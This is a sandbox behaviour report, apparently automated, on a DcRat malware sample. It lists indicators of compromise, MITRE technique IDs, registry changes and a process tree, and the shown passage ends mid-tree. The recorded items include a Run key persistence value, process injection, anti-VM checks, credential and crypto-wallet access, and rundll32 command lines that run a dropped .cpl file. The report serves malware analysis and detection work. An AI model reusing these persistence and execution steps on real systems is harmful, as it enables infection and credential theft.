dcrat | 1518914aa7cd5a971cf197b4d666f565006fc3221684131a1a96aea8a0269216

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	6406.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	6F43.exe

Executes dropped EXE 12 IoCs

pid	Process
4504	5BD7.exe
2184	5D5E.exe
3596	6406.exe
4484	6F43.exe
4964	ss41.exe
2384	toolspub2.exe
5080	31839b57a4f11171d6abc8bbc4451ee4.exe
3172	758E.exe
3688	toolspub2.exe
4496	7D6E.exe
5204	31839b57a4f11171d6abc8bbc4451ee4.exe
5112	csrss.exe

Loads dropped DLL 2 IoCs

pid	Process
2248	rundll32.exe
5020	rundll32.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	31839b57a4f11171d6abc8bbc4451ee4.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in System32 directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 2476 set thread context of 4924	2476	1518914aa7cd5a971cf197b4d666f565006fc3221684131a1a96aea8a0269216.exe	88
PID 2384 set thread context of 3688	2384	toolspub2.exe	120
PID 3172 set thread context of 3560	3172	758E.exe	121
PID 4496 set thread context of 4840	4496	7D6E.exe	124

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\VBoxMiniRdrDN	31839b57a4f11171d6abc8bbc4451ee4.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\rss	31839b57a4f11171d6abc8bbc4451ee4.exe
File created	C:\Windows\rss\csrss.exe	31839b57a4f11171d6abc8bbc4451ee4.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
2652	schtasks.exe
1596	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3052 = "Qyzylorda Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-3141 = "South Sudan Daylight Time"	31839b57a4f11171d6abc8bbc4451ee4.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	31839b57a4f11171d6abc8bbc4451ee4.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000_Classes\Local Settings	6406.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4924	AppLaunch.exe
4924	AppLaunch.exe
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found
2556	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2556	Process not Found

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
4924	AppLaunch.exe
3688	toolspub2.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

pid	Process
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeDebugPrivilege	4504	5BD7.exe
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeDebugPrivilege	2184	5D5E.exe
Token: SeDebugPrivilege	3560	vbc.exe
Token: SeDebugPrivilege	4840	vbc.exe
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeDebugPrivilege	5540	powershell.exe
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found
Token: SeCreatePagefilePrivilege	2556	Process not Found
Token: SeShutdownPrivilege	2556	Process not Found

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe
4296	msedge.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
2556	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2476 wrote to memory of 4924	2476	1518914aa7cd5a971cf197b4d666f565006fc3221684131a1a96aea8a0269216.exe	88
PID 2476 wrote to memory of 4924	2476	1518914aa7cd5a971cf197b4d666f565006fc3221684131a1a96aea8a0269216.exe	88
PID 2476 wrote to memory of 4924	2476	1518914aa7cd5a971cf197b4d666f565006fc3221684131a1a96aea8a0269216.exe	88
PID 2476 wrote to memory of 4924	2476	1518914aa7cd5a971cf197b4d666f565006fc3221684131a1a96aea8a0269216.exe	88
PID 2476 wrote to memory of 4924	2476	1518914aa7cd5a971cf197b4d666f565006fc3221684131a1a96aea8a0269216.exe	88
PID 2476 wrote to memory of 4924	2476	1518914aa7cd5a971cf197b4d666f565006fc3221684131a1a96aea8a0269216.exe	88
PID 2556 wrote to memory of 4504	2556	Process not Found	94
PID 2556 wrote to memory of 4504	2556	Process not Found	94
PID 2556 wrote to memory of 4504	2556	Process not Found	94
PID 2556 wrote to memory of 2184	2556	Process not Found	95
PID 2556 wrote to memory of 2184	2556	Process not Found	95
PID 2556 wrote to memory of 2184	2556	Process not Found	95
PID 2556 wrote to memory of 3596	2556	Process not Found	97
PID 2556 wrote to memory of 3596	2556	Process not Found	97
PID 2556 wrote to memory of 3596	2556	Process not Found	97
PID 2556 wrote to memory of 3120	2556	Process not Found	98
PID 2556 wrote to memory of 3120	2556	Process not Found	98
PID 3596 wrote to memory of 4468	3596	6406.exe	100
PID 3596 wrote to memory of 4468	3596	6406.exe	100
PID 3596 wrote to memory of 4468	3596	6406.exe	100
PID 3120 wrote to memory of 4296	3120	cmd.exe	102
PID 3120 wrote to memory of 4296	3120	cmd.exe	102
PID 4296 wrote to memory of 4776	4296	msedge.exe	103
PID 4296 wrote to memory of 4776	4296	msedge.exe	103
PID 4468 wrote to memory of 2248	4468	control.exe	104
PID 4468 wrote to memory of 2248	4468	control.exe	104
PID 4468 wrote to memory of 2248	4468	control.exe	104
PID 3120 wrote to memory of 4680	3120	cmd.exe	105
PID 3120 wrote to memory of 4680	3120	cmd.exe	105
PID 4680 wrote to memory of 664	4680	msedge.exe	106
PID 4680 wrote to memory of 664	4680	msedge.exe	106
PID 2556 wrote to memory of 4484	2556	Process not Found	107
PID 2556 wrote to memory of 4484	2556	Process not Found	107
PID 2556 wrote to memory of 4484	2556	Process not Found	107
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110
PID 4296 wrote to memory of 3684	4296	msedge.exe	110

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\1518914aa7cd5a971cf197b4d666f565006fc3221684131a1a96aea8a0269216.exe
"C:\Users\Admin\AppData\Local\Temp\1518914aa7cd5a971cf197b4d666f565006fc3221684131a1a96aea8a0269216.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2476
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
  2⤵
  - DcRat
  - Checks SCSI registry key(s)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  PID:4924

C:\Users\Admin\AppData\Local\Temp\5BD7.exe
C:\Users\Admin\AppData\Local\Temp\5BD7.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4504

C:\Users\Admin\AppData\Local\Temp\5D5E.exe
C:\Users\Admin\AppData\Local\Temp\5D5E.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2184

C:\Users\Admin\AppData\Local\Temp\6406.exe
C:\Users\Admin\AppData\Local\Temp\6406.exe
1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3596
- C:\Windows\SysWOW64\control.exe
  "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\co~7NDm.cpl",
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4468
- - C:\Windows\SysWOW64\rundll32.exe
    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\co~7NDm.cpl",
    3⤵
    - Loads dropped DLL
    PID:2248
  - - C:\Windows\system32\RunDll32.exe
      C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\co~7NDm.cpl",
      4⤵
      PID:988
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\co~7NDm.cpl",
        5⤵
        Loads dropped DLL
        
        PID:5020

C:\Windows\system32\cmd.exe
